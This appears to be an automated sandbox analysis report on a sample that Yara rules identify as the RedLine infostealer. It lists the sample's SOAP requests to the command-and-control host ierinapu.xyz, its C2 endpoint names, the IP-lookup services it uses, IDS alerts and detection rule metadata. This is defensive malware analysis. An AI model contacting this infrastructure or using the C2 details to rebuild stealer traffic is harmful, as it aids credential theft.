Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate

Source: Joe Sandbox View

IP Address: 18.141.10.107 18.141.10.107

Source: Joe Sandbox View

ASN Name: AMAZON-02US AMAZON-02US

Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.5:49708
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.5:49708

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: ierinapu.xyz

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002ADB000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000296D000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002A15000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002A05000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000297D000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.00000000029AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ierinapu.xyz
Source: bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ierinapu.xyz/
Source: bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ierinapu.xyz:80/
Source: bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: bac4j0DRRb.exe, 00000000.00000002.3289675118.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.00000000029F5000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000294C000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000299D000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002ABC000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000298D000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000291E000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002ADB000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000296D000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002916000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000293F000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002A15000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002A05000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000297D000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.00000000029AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultH
Source: bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002909000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: bac4j0DRRb.exe, 00000000.00000002.3289675118.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.00000000029F5000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000294C000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000299D000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002ABC000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000298D000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000291E000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002ADB000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000296D000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002916000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000293F000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002A15000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002A05000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.000000000297D000.00000004.00000800.00020000.00000000.sdmp, bac4j0DRRb.exe, 00000000.00000002.3289675118.00000000029AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002916000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0t
Source: bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/
Source: bac4j0DRRb.exe, 00000000.00000002.3289675118.00000000029AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetArguments
Source: bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetArgumentsLRjq
Source: bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetArgumentsResponse
Source: bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002909000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetArgumentsT
Source: bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesLRjq
Source: bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyScanRequestLRjq(
Source: bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyScanRequestResponse
Source: bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateLRjq
Source: bac4j0DRRb.exe, 00000000.00000002.3289675118.0000000002871000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: bac4j0DRRb.exe	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: bac4j0DRRb.exe	String found in binary or memory: https://api.ipify.org
Source: bac4j0DRRb.exe	String found in binary or memory: https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy
Source: bac4j0DRRb.exe	String found in binary or memory: https://ipinfo.io/ip%appdata%

System Summary

Malicious sample detected (through community Yara rule)

Source: bac4j0DRRb.exe, type: SAMPLE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: bac4j0DRRb.exe, type: SAMPLE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.0.bac4j0DRRb.exe.450000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.0.bac4j0DRRb.exe.450000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000000.2027367969.0000000000452000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: bac4j0DRRb.exe PID: 4028, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Code function: 0_2_026CDDE8		0_2_026CDDE8
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Code function: 0_2_026CD4F0		0_2_026CD4F0

Source: bac4j0DRRb.exe, 00000000.00000002.3289204149.000000000090E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs bac4j0DRRb.exe
Source: bac4j0DRRb.exe, 00000000.00000000.2027386663.000000000046A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameHetaerist.exe4 vs bac4j0DRRb.exe
Source: bac4j0DRRb.exe	Binary or memory string: OriginalFilenameHetaerist.exe4 vs bac4j0DRRb.exe

Source: bac4j0DRRb.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: bac4j0DRRb.exe, type: SAMPLE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: bac4j0DRRb.exe, type: SAMPLE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.0.bac4j0DRRb.exe.450000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.0.bac4j0DRRb.exe.450000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000000.2027367969.0000000000452000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: bac4j0DRRb.exe PID: 4028, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\bac4j0DRRb.exe

Mutant created: NULL

Source: bac4j0DRRb.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: bac4j0DRRb.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%

Source: C:\Users\user\Desktop\bac4j0DRRb.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: bac4j0DRRb.exe

ReversingLabs: Detection: 81%

Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: bac4j0DRRb.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: bac4j0DRRb.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: bac4j0DRRb.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdb source: bac4j0DRRb.exe, 00000000.00000002.3289204149.000000000097A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: bac4j0DRRb.exe, 00000000.00000002.3289204149.000000000097A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: bac4j0DRRb.exe, 00000000.00000002.3289204149.0000000000942000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: bac4j0DRRb.exe, 00000000.00000002.3289204149.000000000097A000.00000004.00000020.00020000.00000000.sdmp

Source: bac4j0DRRb.exe

Static PE information: 0xB7C91059 [Fri Sep 16 14:04:09 2067 UTC]

Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Memory allocated: 26C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Memory allocated: 2870000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\bac4j0DRRb.exe	Memory allocated: 4870000 memory reserve \| memory write watch	Jump to behavior

